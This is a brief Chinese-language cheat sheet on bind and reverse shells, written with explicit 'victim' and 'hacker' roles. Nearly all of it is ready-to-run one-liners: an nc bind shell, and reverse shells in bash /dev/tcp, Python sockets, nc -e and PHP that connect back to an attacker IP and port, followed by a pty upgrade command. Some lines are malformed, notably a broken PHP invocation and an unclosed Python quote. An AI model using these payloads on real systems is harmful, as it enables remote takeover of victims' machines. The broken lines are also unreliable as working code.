1. 正向反弹shell
受害机监听7777:
nc -lvp 7777 -e /bin/bash
黑客正向连接
nc ip 7777
2. 反向反弹shell
黑客监听7777:
nc -lvp 7777
受害机反向连接
# 基于bash反弹
bash -i >& /dev/tcp/ip/port 0>&1
# 基于python反弹
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
// 基于nc反弹
nc -e /bin/bash 192.168.0.4 7777
// 基于php反弹 注: 需要php关闭safe_mode这个选项
php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")'
或
php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'
遇到反弹后不是正常的shell,可用命令:
python -c 'import pty;pty.spawn("/bin/bash")'
转化为常规的shell。